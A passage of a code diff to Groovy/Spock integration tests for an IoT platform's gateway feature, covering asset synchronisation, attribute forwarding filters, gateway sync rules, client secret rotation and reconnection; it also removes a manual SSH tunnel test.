-            assert attributeEvents.size() == 4
-            assert attributeEvents.any { it.id == managerTestSetup.light2Id && it.name == LightAsset.ON_OFF.name && it.value.orElse(false) }
-            assert attributeEvents.any { it.id == managerTestSetup.light1Id && it.name == LightAsset.ON_OFF.name && it.value.orElse(false) }
-            assert attributeEvents.any { it.id == mapAssetId(gateway.id, managerTestSetup.light2Id, false) && it.name == LightAsset.ON_OFF.name && it.value.orElse(false) }
-            assert attributeEvents.any { it.id == mapAssetId(gateway.id, managerTestSetup.light1Id, false) && it.name == LightAsset.ON_OFF.name && it.value.orElse(false) }
-        }
-
-        when: "a gateway client asset is deleted"
-        def deleted = assetStorageService.delete(Collections.singletonList(managerTestSetup.microphone1Id))
-
-        then: "the client asset should have been deleted and also the mirrored asset under the gateway should also be deleted"
-        assert deleted
-        conditions.eventually {
-            assert assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.microphone1Id, false)) == null
-        }
-
-        when: "attribute filters are added to the gateway connection and persisted"
-        gatewayConnection.setAttributeFilters([
-                new GatewayAttributeFilter().setMatcher(new AssetQuery().types(LightAsset.class)).setValueChange(true),
-                new GatewayAttributeFilter().setMatcher(new AssetQuery().types(PeopleCounterAsset.class).attributeNames(PeopleCounterAsset.COUNT_TOTAL.name, PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name))
-                        .setDelta(1.5d),
-                new GatewayAttributeFilter().setMatcher(new AssetQuery().names("Microphone 2")).setDuration("PT1M"),
-                // Ignore any other attribute
-                new GatewayAttributeFilter().setSkipAlways(true)
-        ])
-        def oldConnector = gatewayClientService.connectionRealmMap.get(gatewayConnection.getLocalRealm())
-        gatewayClientResource.setConnection(null, managerTestSetup.realmCityName, gatewayConnection)
-
-        then: "the gateway connection IO client should have been replaced and synchronisation should be complete"
-        conditions.eventually {
-            assert gatewayClientService.connectionRealmMap.get(gatewayConnection.getLocalRealm()) != null
-            assert gatewayClientService.connectionRealmMap.get(gatewayConnection.getLocalRealm()) != oldConnector
-            GatewayConnector connector = gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT))
-            assert connector != null
-            assert !connector.initialSyncInProgress
-            assert attributeEvents.any { it.id == gateway.id && it.value.get() == ConnectionStatus.CONNECTED }
-        }
-
-        when: "an attribute event occurs in the edge gateway realm for an attribute with a value change filter and the attribute value has not changed"
-        attributeEvents.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.light2Id, LightAsset.ON_OFF, true))
-
-        then: "the value should not have been forwarded to the central instance"
-        delayedConditions.eventually {
-            assert attributeEvents.any { it.id == managerTestSetup.light2Id && it.name == LightAsset.ON_OFF.name && it.value.orElse(false) }
-            assert !attributeEvents.any { it.id == mapAssetId(gateway.id, managerTestSetup.light2Id, false) && it.name == LightAsset.ON_OFF.name }
-        }
-
-        when: "an attribute event occurs in the edge gateway realm for an attribute with a value change filter and the attribute value has changed"
-        attributeEvents.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.light2Id, LightAsset.ON_OFF, false))
-
-        then: "the value should now have been forwarded to the central instance"
-        conditions.eventually {
-            def mirroredLight2 = assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.light2Id, false))
-            assert mirroredLight2 != null
-            assert !mirroredLight2.getAttribute(LightAsset.ON_OFF).flatMap { it.getValue() }.orElse(true)
-            assert attributeEvents.any { it.id == managerTestSetup.light2Id && it.name == LightAsset.ON_OFF.name && !it.value.orElse(true) }
-            assert attributeEvents.any { it.id == mapAssetId(gateway.id, managerTestSetup.light2Id, false) && it.name == LightAsset.ON_OFF.name && !it.value.orElse(true) }
-        }
-
-        when: "an attribute event occurs in the edge gateway realm for an attribute with a delta filter and the attribute value has changed by less than delta"
-        attributeEvents.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.peopleCounter1AssetId, PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE, 0.5d))
-
-        then: "the value should not have been forwarded to the central instance"
-        delayedConditions.eventually {
-            assert attributeEvents.any { it.id == managerTestSetup.peopleCounter1AssetId && it.name == PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name && Math.abs(it.value.orElse(0d) - 0.5d) < 0.000001d }
-            assert !attributeEvents.any { it.id == mapAssetId(gateway.id, managerTestSetup.peopleCounter1AssetId, false) && it.name == PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name }
-        }
-
-        when: "an attribute event occurs in the edge gateway realm for an attribute with a delta filter and the attribute value has changed by more than delta"
-        attributeEvents.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.peopleCounter1AssetId, PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE, -1.1d))
-
-        then: "the value should have been forwarded to the central instance"
-        conditions.eventually {
-            assert attributeEvents.any { it.id == managerTestSetup.peopleCounter1AssetId && it.name == PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name && Math.abs(it.value.orElse(0d) + 1.1d) < 0.000001d }
-            assert attributeEvents.any { it.id == mapAssetId(gateway.id, managerTestSetup.peopleCounter1AssetId, false) && it.name == PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name && Math.abs(it.value.orElse(0d) + 1.1d) < 0.000001d }
-        }
-
-        when: "an attribute event occurs in the edge gateway realm for an attribute with a duration filter"
-        attributeEvents.clear()
-        microphone2 = assetStorageService.find(microphone2.id)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(microphone2.id, MicrophoneAsset.SOUND_LEVEL, 50d))
-
-        then: "the value should have been forwarded to the central instance (as no prior value has been sent since the filter was created)"
-        conditions.eventually {
-            assert attributeEvents.any { it.id == microphone2.id && it.name == MicrophoneAsset.SOUND_LEVEL.name && Math.abs(it.value.orElse(0d) - 50d) < 0.000001d }
-            assert attributeEvents.any { it.id == mapAssetId(gateway.id, microphone2.id, false) && it.name == MicrophoneAsset.SOUND_LEVEL.name && Math.abs(it.value.orElse(0d) - 50d) < 0.000001d }
-        }
-
-        when: "an attribute event occurs in the edge gateway realm for the same attribute before the duration filter has elapsed"
-        attributeEvents.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(microphone2.id, MicrophoneAsset.SOUND_LEVEL, 60d))
-
-        then: "the value should not have been forwarded to the central instance"
-        delayedConditions.eventually {
-            assert attributeEvents.any { it.id == microphone2.id && it.name == MicrophoneAsset.SOUND_LEVEL.name && Math.abs(it.value.orElse(0d) - 60d) < 0.000001d }
-            assert !attributeEvents.any { it.id == mapAssetId(gateway.id, microphone2.id, false) && it.name == MicrophoneAsset.SOUND_LEVEL.name }
-        }
-
-        when: "an attribute event occurs in the edge gateway realm for an attribute that matches the catch all and skip filter"
-        attributeEvents.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.area1Id, Asset.NOTES, "Some test notes"))
-
-        then: "the value should not have been forwarded to the central instance"
-        delayedConditions.eventually {
-            assert attributeEvents.any { it.id == managerTestSetup.area1Id && it.name == Asset.NOTES.name && "Some test notes".equals(it.value.orElse(null)) }
-            assert !attributeEvents.any { it.id == mapAssetId(gateway.id, managerTestSetup.area1Id, false) && it.name == Asset.NOTES.name }
-        }
-
-        cleanup: "Remove any subscriptions created"
-        if (clientEventService != null) {
-            clientEventService.removeSubscription(eventConsumer)
-        }
-        if (gateway != null) {
-            assetStorageService.delete([gateway.id])
-        }
+    then: "the asset should also be updated in the local manager"
+    conditions.eventually {
+      localBuilding1Room5Asset = assetStorageService.find(mapAssetId(gateway.id, building1Room5AssetId, false))
+      assert localBuilding1Room5Asset != null
+      assert localBuilding1Room5Asset.getVersion() == 1
+      assert localBuilding1Room5Asset.getName() == "Test Building 1 Room 5 Updated"
+      assert localBuilding1Room5Asset.getType() == RoomAsset.DESCRIPTOR.getName()
+      assert localBuilding1Room5Asset.getRealm() == managerTestSetup.realmBuildingName
+      assert localBuilding1Room5Asset.getParentId() == mapAssetId(gateway.id, assetIds[0], false)
+      assert localBuilding1Room5Asset.getAttributes().size() == 7
+      assert localBuilding1Room5Asset.getAttribute("co2Level").flatMap {
+        it.getValue()
+      }.orElse(0i) == 500i
     }
 
-    /**
-     * This test requires a manager instance with tunnelling configured, so is manual for now unfortunately.
-     * Change the test url and key path to match the instance to connect to.
-     * Recommended to run profile/dev-proxy.yml profile.
-     */
-    @Ignore
-    def "Verify gateway tunnel factory"() {
-        given: "an ssh private key and the URL of a manager instance with tunnelling configured"
-        def keyPath = Paths.get(System.getProperty("user.home"), ".ssh", "test_key")
-        def tunnelSSHHost = "custom-project-test.openremote.app"
-        def tunnelSSHPort = 2222
-        def tmpDir = new File("tmp")
-        def lockFile = new File(tmpDir, "lock.file")
+    when: "an asset is deleted on the gateway and the local manager is notified"
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.DELETE, building1Room5Asset, null)).get())
 
-        and: "an instance of the gateway tunnel factory is created"
-        def container = new Container(Collections.emptyMap(), Collections.emptyList())
-        def conditions = new PollingConditions(timeout: 15, delay: 1)
-        def tunnelFactory = new MINAGatewayTunnelFactory(container.EXECUTOR, Container.SCHEDULED_EXECUTOR, keyPath.toFile(), null)
-        tunnelFactory.start()
-
-        expect: "the SSH client to be ready"
-        conditions.eventually {
-            tunnelFactory.client.isStarted()
-        }
-
-        and: "A configured GatewayTunnelInfo for HTTPS on localhost:443"
-        def tunnelInfo = new GatewayTunnelInfo(Constants.MASTER_REALM,
-                "abcedf123456",
-                GatewayTunnelInfo.Type.HTTPS,
-                "localhost", 443)
-
-        and: "A completion variable for the close callback"
-        AtomicBoolean closed = new AtomicBoolean(false)
-
-        when: "Create session is called"
-        GatewayTunnelSession session = tunnelFactory.createSession(tunnelSSHHost, tunnelSSHPort, tunnelInfo, { t ->
-            closed.set(true)
-        })
-
-        then: "The session connection future should complete successfully"
-        new PollingConditions(timeout: 60).eventually {
-            assert session.getConnectFuture().isDone()
-            assert !session.getConnectFuture().isCompletedExceptionally()
-        }
-
-        then: "we keep the tunnel open for manual testing until lock file is deleted"
-        if (!tmpDir.exists()) {
-            tmpDir.mkdirs()
-        }
-        if (!lockFile.exists()) {
-            lockFile.createNewFile()
-        }
-        getLOG().info("---------------------------------------------------------------------------------")
-        getLOG().info("TEST PAUSED FOR TUNNEL TESTING")
-        getLOG().info("Delete the lock file to continue: ${lockFile.absolutePath}")
-        getLOG().info("Tunnel should be accessible at: gw-54tnxwr2oobjafque1jndh.${tunnelSSHHost}")
-        getLOG().info("---------------------------------------------------------------------------------")
-
-        while (lockFile.exists()) {
-            getLOG().info("Tunnel is open")
-            Thread.sleep(5000)
-        }
-
-        when: "we close the tunnel gracefully"
-        session.disconnect()
-
-        then: "the tunnel should be closed without error"
-        noExceptionThrown()
-
-        cleanup: "cleanup"
-        if (tunnelFactory != null) {
-            tunnelFactory.stop()
-        }
+    then: "the asset should also be deleted in the local manager"
+    conditions.eventually {
+      def asset = assetStorageService.find(mapAssetId(gateway.id, building1Room5AssetId, false))
+      assert asset == null
     }
 
-    def "Verify GatewayAssetSyncRules"() {
+    when: "the client received messages are cleared"
+    clientReceivedMessages.clear()
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 30, delay: 0.2)
-        def delayedConditions = new PollingConditions(initialDelay: 1, delay: 1, timeout: 10)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def timerService = container.getService(TimerService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def gatewayService = container.getService(GatewayService.class)
-        def gatewayClientService = container.getService(GatewayClientService.class)
-        def agentService = container.getService(AgentService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def clientEventService = container.getService(ClientEventService.class)
+    and: "an attempt is made to add a child asset to the gateway in the local manager"
+    assetStorageService.merge(localBuilding1Room5Asset)
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    then: "an exception should be thrown"
+    thrown(IllegalStateException)
 
-        and: "the gateway client resource"
-        def gatewayClientResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(GatewayClientResource.class)
+    when: "the client received messages are cleared"
+    clientReceivedMessages.clear()
 
-        expect: "the system should settle down"
-        conditions.eventually {
-            assert noEventProcessedIn(assetProcessingService, 300)
+    and: "an attempt is made to modify a child asset of the gateway in the local manager"
+    localBuilding1Room5Asset.setName("Test Building 1 Room 5")
+    localBuilding1Room5Asset.getAttributes().remove("co2Level")
+    localBuilding1Room5Asset = assetStorageService.merge(localBuilding1Room5Asset)
+
+    then: "an exception should be thrown"
+    thrown(IllegalStateException)
+
+    when: "an attempt is made to delete a child asset of the gateway in the local manager"
+    assetStorageService.delete([mapAssetId(gateway.id, assetIds[0], false)])
+
+    then: "an exception should be thrown"
+    thrown(IllegalStateException)
+
+    then: "the asset should not have been deleted"
+    assert assetStorageService.find(mapAssetId(gateway.id, assetIds[0], false)) != null
+
+    when: "time advances"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+
+    and: "the gateway asset is marked as disabled"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(gateway.getId(), GatewayAsset.DISABLED, true))
+
+    then: "the gateway asset status should become DISCONNECTED"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId(), true)
+      assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.DISCONNECTED
+    }
+
+    and: "the gateway connector should be marked as disconnected and the gateway client should have been disconnected"
+    conditions.eventually {
+      assert gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).disabled
+      assert !gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).connected
+    }
+
+    when: "an attempt is made to add a descendant asset to a gateway that isn't connected"
+    gatewayClient.disconnect()
+    def failedAsset = new BuildingAsset("Failed Asset")
+            .setId(UniqueIdentifierGenerator.generateId("Failed asset"))
+            .setCreatedOn(timerService.getNow())
+            .setParentId(gateway.id)
+            .setRealm(managerTestSetup.realmBuildingName)
+    failedAsset.path = (String[]) [UniqueIdentifierGenerator.generateId("Failed asset")].toArray(new String[0])
+    failedAsset.addOrReplaceAttributes(
+            new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addMeta(
+                    new MetaItem<>(ACCESS_PUBLIC_READ)
+                    )
+            )
+    assetStorageService.merge(failedAsset)
+
+    then: "an error should occur"
+    thrown(IllegalStateException)
+
+    when: "gateway assets are modified whilst the gateway is disconnected (building1Room5 re-added, building5 and descendants removed and building1 modified and building1Room1 attribute updated)"
+    assets[4].setName("Test Building 1 Updated")
+    assets[4].setVersion(2L)
+    assets[0].getAttribute("temp").ifPresent { it.setValue(10) }
+    assets = assets.subList(0, 20)
+
+    and: "the client received messages are cleared"
+    clientReceivedMessages.clear()
+
+    and: "time advances"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+
+    and: "the gateway is enabled again"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(gateway.getId(), GatewayAsset.DISABLED.getName(), false))
+
+    then: "the gateway connector should be enabled"
+    conditions.eventually {
+      assert !gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).disabled
+    }
+
+    when: "the gateway asset client secret attribute is updated"
+    def newSecret = UUID.randomUUID().toString()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(gateway.getId(), GatewayAsset.CLIENT_SECRET, newSecret))
+
+    then: "the service user secret should be updated"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId()) as GatewayAsset
+      assert gateway.getClientSecret().orElse(null) == newSecret
+      def user = identityProvider.getUserByUsername(gateway.getRealm(), User.SERVICE_ACCOUNT_PREFIX + gateway.getClientId().orElse(""))
+      assert user != null
+      assert user.secret == newSecret
+    }
+
+    when: "the gateway client reconnects with the new secret"
+    gatewayClient = new WebsocketIOClient<String>(
+            new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=$managerTestSetup.realmBuildingName").build(),
+            null,
+            new OAuthClientCredentialsGrant("http://127.0.0.1:$serverPort/auth/realms/$managerTestSetup.realmBuildingName/protocol/openid-connect/token",
+            gateway.getClientId().orElse(""),
+            gateway.getClientSecret().orElse(""),
+            null).setBasicAuthHeader(true))
+    gatewayClient.setEncoderDecoderProvider({
+      [new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, gatewayClient)].toArray(new ChannelHandler[0])
+    })
+    gatewayClient.addMessageConsumer({ message ->
+      clientReceivedMessages.add(message)
+    })
+    gatewayClient.addConnectionStatusConsumer({ status ->
+      connectionStatus = status
+    })
+    gatewayClient.connect()
+
+    then: "the gateway netty client status should become CONNECTING"
+    conditions.eventually {
+      assert connectionStatus == ConnectionStatus.CONNECTING
+      assert gatewayClient.connectionStatus == ConnectionStatus.CONNECTING
+    }
+
+    and: "the gateway asset connection status should be CONNECTING"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId())
+      assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTING
+    }
+
+    and: "the local manager should have sent an asset read request"
+    conditions.eventually {
+      assert clientReceivedMessages.size() >= 1
+      assert clientReceivedMessages.find {
+        it.startsWith(SharedEvent.MESSAGE_PREFIX) && it.contains("read-assets")
+      } != null
+    }
+
+    when: "the previously received messages are cleared"
+    clientReceivedMessages.clear()
+
+    and: "the gateway client replies to the central manager with the assets of the gateway"
+    sendAssets = [building1Room5Asset]
+    sendAssets.addAll(agentAssets)
+    sendAssets.addAll(assets)
+    readAssetsReplyEvent = new AssetsEvent(sendAssets)
+    readAssetsReplyEvent.setMessageID(GatewayConnector.ASSET_READ_EVENT_NAME_INITIAL)
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
+
+    then: "the central manager should have requested the full loading of the first batch of assets"
+    conditions.eventually {
+      assert clientReceivedMessages.size() == 1
+      assert clientReceivedMessages.get(0).contains("read-assets")
+      readAssetsEvent = ValueUtil.JSON.readValue(clientReceivedMessages[0].substring(SharedEvent.MESSAGE_PREFIX.length()), ReadAssetsEvent.class)
+      messageId = readAssetsEvent.messageID
+      assert messageId == GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + "0"
+      assert readAssetsEvent.assetQuery != null
+      assert readAssetsEvent.assetQuery.ids != null
+      assert readAssetsEvent.assetQuery.ids.length == GatewayConnector.SYNC_ASSET_BATCH_SIZE
+      assert agentAssetIds.stream().filter {
+        readAssetsEvent.assetQuery.ids.contains(it)
+      }.count() == agentAssetIds.size()
+      assert assetIds.stream().filter {
+        readAssetsEvent.assetQuery.ids.contains(it)
+      }.count() + 1 == GatewayConnector.SYNC_ASSET_BATCH_SIZE - agentAssetIds.size()
+    }
+
+    when: "another asset is added to the gateway during the initial sync process"
+    def building2Room5Asset = new RoomAsset("Test Building 2 Room 5")
+            .setId(UniqueIdentifierGenerator.generateId("Test Building 2 Room 5"))
+            .setCreatedOn(timerService.getNow())
+            .setParentId(assetIds[5])
+            .setRealm(MASTER_REALM)
+    building2Room5Asset.path = (String[]) [UniqueIdentifierGenerator.generateId("Test Building 2 Room 5"), assetIds[5]]
+
+    building2Room5Asset.addOrReplaceAttributes(
+            new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addOrReplaceMeta(
+                    new MetaItem<>(ACCESS_PUBLIC_READ)
+                    ),
+            new Attribute<>("temp", NUMBER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[1])
+                    .setPath("")),
+                    new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
+                    ),
+            new Attribute<>("tempSetpoint", NUMBER).addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[1])
+                    .setPath("")),
+                    new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
+                    )
+            )
+
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.CREATE, building2Room5Asset, null)).get())
+
+    and: "another asset is deleted from the gateway during the initial sync process (Building 3 Room 1)"
+    def removedAsset = assets.remove(10)
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.DELETE, removedAsset, null)).get())
+
+    and: "the gateway returns the requested assets (minus the deleted Building 3 Room 1 asset)"
+    sendAssets = [building1Room5Asset]
+    sendAssets.addAll(agentAssets)
+    sendAssets.addAll(Arrays.stream(readAssetsEvent.assetQuery.ids).filter {
+      !agentAssetIds.contains(it) && it != removedAsset.id && it != building1Room5Asset.id
+    }.map { id ->
+      assets.stream().filter {
+        it.id == id
+      }.findFirst().orElse(null)
+    }.collect(Collectors.toList()))
+    readAssetsReplyEvent = new AssetsEvent(sendAssets)
+    readAssetsReplyEvent.setMessageID(messageId)
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
+
+    then: "the central manager should have requested the full loading of the second batch of assets"
+    conditions.eventually {
+      assert clientReceivedMessages.size() == 2
+      assert clientReceivedMessages.get(1).contains("read-assets")
+      readAssetsEvent = ValueUtil.JSON.readValue(clientReceivedMessages[1].substring(SharedEvent.MESSAGE_PREFIX.length()), ReadAssetsEvent.class)
+      messageId = readAssetsEvent.messageID
+      assert messageId == GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + (GatewayConnector.SYNC_ASSET_BATCH_SIZE - 1)
+      assert readAssetsEvent.assetQuery != null
+      assert readAssetsEvent.assetQuery.ids != null
+      assert readAssetsEvent.assetQuery.ids.length == agentAssetIds.size() + assets.size() + 1 - GatewayConnector.SYNC_ASSET_BATCH_SIZE + 1
+      assert assets.stream().filter { asset ->
+        sendAssets.stream().noneMatch {
+          it.id == asset.id
         }
+      }.count() == readAssetsEvent.assetQuery.ids.length
+    }
 
-        when: "a gateway asset is provisioned in this manager in the building realm"
-        GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
-                .setRealm(managerTestSetup.realmBuildingName))
+    when: "the gateway returns the requested assets"
+    sendAssets = new CopyOnWriteArrayList<>()
+    sendAssets.addAll(Arrays.stream(readAssetsEvent.assetQuery.ids).map { id ->
+      assets.stream().filter { asset ->
+        asset.id == id
+      }.findFirst().orElse(null)
+    }.collect(Collectors.toList()))
+    readAssetsReplyEvent = new AssetsEvent(sendAssets)
+    readAssetsReplyEvent.setMessageID(messageId)
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
 
-        then: "a set of credentials should have been created for this gateway and be stored against the gateway for easy reference"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId(), true) as GatewayAsset
-            assert !isNullOrEmpty(gateway.getClientId().orElse(null))
-            assert !isNullOrEmpty(gateway.getClientSecret().orElse(null))
-        }
+    then: "the central manager should have requested the capabilities of the gateway"
+    conditions.eventually {
+      assert clientReceivedMessages.size() == 3
+      assert clientReceivedMessages.get(2).contains(GatewayCapabilitiesRequestEvent.TYPE)
+      def gatewayCapabilitiesRequest = ValueUtil.JSON.readValue(clientReceivedMessages[2].substring(SharedEvent.MESSAGE_PREFIX.length()), GatewayCapabilitiesRequestEvent.class)
+      messageId = gatewayCapabilitiesRequest.messageID
+    }
 
-        and: "a gateway connector should have been created for this gateway"
-        conditions.eventually {
-            assert gatewayService.gatewayConnectorMap.size() == 1
-            assert gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).gatewayId == gateway.getId()
-        }
+    when: "The Gateway also sends a Gateway Capabilities response indicating tunnelling is supported"
+    capabilitiesReplyEvent.setMessageID(messageId)
+    capabilitiesReplyEvent = new GatewayCapabilitiesResponseEvent(VersionInfo.getGatewayApiVersion(), true)
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(capabilitiesReplyEvent).get())
 
-        when: "a gateway client connection is created to connect the city realm to the gateway in the building realm"
-        def gatewayConnection = new GatewayConnection(
-                managerTestSetup.realmCityName,
-                "127.0.0.1",
-                serverPort,
-                managerTestSetup.realmBuildingName,
-                gateway.getClientId().orElse(""),
-                gateway.getClientSecret().orElse(""),
-                false,
-                null,
-                [
-                        "*" : new GatewayAssetSyncRule().setExcludeAttributeMeta([
-                                "*": [
-                                    ACCESS_PUBLIC_READ.name,
-                                    ACCESS_PUBLIC_WRITE.name,
-                                    STORE_DATA_POINTS.name
-                                ]
-                        ]).setAddAttributeMeta([
-                                "*": new MetaMap([
-                                    new MetaItem<>(ACCESS_RESTRICTED_READ, true)
-                                ])
-                        ]).setExcludeAttributes([
-                                Asset.NOTES.name
-                        ]),
-                        "LightAsset" : new GatewayAssetSyncRule().setExcludeAttributeMeta([
-                                "*": [
-                                        ATTRIBUTE_LINKS.name,
-                                        ACCESS_PUBLIC_WRITE.name,
-                                        FORMAT.name
-                                ]
-                        ]).setAddAttributeMeta([
-                                "onOff" : new MetaMap([
-                                        new MetaItem<>(FORMAT, ValueFormat.BOOLEAN_AS_PRESSED_RELEASED())
-                                ])
-                        ]).setExcludeAttributes([
-                                LightAsset.COLOUR_RGB.name
-                        ]).setAccessPublicRead(false)
-                ] as Map<String, GatewayAssetSyncRule>,
-                false
-        )
-        gatewayClientResource.setConnection(null, managerTestSetup.realmCityName, gatewayConnection)
 
-        then: "the gateway client should become connected"
-        conditions.eventually {
-            assert gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName) != null
-        }
+    then: "the gateway connector sync should be completed"
+    conditions.eventually {
+      def gatewayConnector = gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT))
+      assert gatewayConnector.isConnected()
+      assert !gatewayConnector.isInitialSyncInProgress()
+    }
 
-        and: "the gateway asset connection status should become CONNECTED"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId())
-            assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
+    and: "the gateway netty client status should become CONNECTED"
+    conditions.eventually {
+      assert connectionStatus == ConnectionStatus.CONNECTED
+      assert gatewayClient.connectionStatus == ConnectionStatus.CONNECTED
+    }
 
-        and: "the assets should have been created under the gateway asset"
-        conditions.eventually {
-            def gatewayAssets = assetStorageService.findAll(new AssetQuery().parents(gateway.id).recursive(true))
-            def cityAssets = assetStorageService.findAll(new AssetQuery().realm(new RealmPredicate(managerTestSetup.realmCityName)))
-            assert gatewayAssets.size() == cityAssets.size()
-        }
+    and: "the gateway asset connection status should be CONNECTED"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId())
+      assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
+      assert gateway.getTunnelingSupported().get() == true
+    }
 
-        and: "the asset sync rules should have been applied"
-        conditions.eventually {
-            def mirroredMicrophone = assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.microphone1Id, false))
-            def mirroredLight = assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.light1Id, false))
-            assert mirroredMicrophone != null
-            assert mirroredLight != null
-            assert mirroredMicrophone.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).flatMap { it.getMetaItem(READ_ONLY) }.flatMap { it.getValue() }.orElse(false)
-            assert mirroredMicrophone.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).flatMap { it.getMetaItem(ACCESS_RESTRICTED_READ) }.flatMap { it.getValue() }.orElse(false)
-            assert !mirroredMicrophone.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).flatMap { it.getMetaItem(STORE_DATA_POINTS) }.flatMap { it.getValue() }.orElse(false)
-            assert mirroredMicrophone.getAttributes().get(MicrophoneAsset.LOCATION).flatMap { it.getMetaItem(ACCESS_RESTRICTED_READ) }.flatMap { it.getValue() }.orElse(false)
-            assert !mirroredMicrophone.getAttribute(Asset.NOTES).isPresent()
-            assert mirroredLight.getAttributes().get(LightAsset.ON_OFF).flatMap { it.getMetaItem(FORMAT) }.flatMap { it.getValue() }.map {it.asPressedReleased}.orElse(false) == ValueFormat.BOOLEAN_AS_PRESSED_RELEASED().asPressedReleased
-            assert !mirroredLight.getAttribute(LightAsset.COLOUR_RGB).isPresent()
-            assert mirroredLight.getAttribute(Asset.NOTES).isPresent()
-            assert !mirroredLight.isAccessPublicRead()
-        }
+    and: "the gateway should have the correct assets"
+    def gatewayAssets = assetStorageService.findAll(new AssetQuery().parents(gateway.getId()).recursive(true))
+    assert gatewayAssets.size() == 2 + agentAssets.size() + assets.size()
+
+    when: "the gateway asset is deleted"
+    def deleted = assetStorageService.delete([gateway.id])
+
+    then: "all descendant assets should have been removed"
+    conditions.eventually {
+      assert assetStorageService.find(mapAssetId(gateway.id, assets[0].id, true)) == null
+    }
+
+    then: "the keycloak client should also be removed"
+    assert deleted
+    conditions.eventually {
+      assert identityProvider.getClient(managerTestSetup.realmBuildingName, getGatewayClientId(gateway.getId())) == null
+    }
+
+    cleanup: "cleanup the gateway client"
+    if (gatewayClient != null) {
+      gatewayClient.disconnect()
+      gatewayClient.removeAllMessageConsumers()
+    }
+  }
+
+  def "Verify gateway client service"() {
+
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 30, delay: 0.2)
+    def delayedConditions = new PollingConditions(initialDelay: 1, delay: 1, timeout: 10)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def timerService = container.getService(TimerService.class)
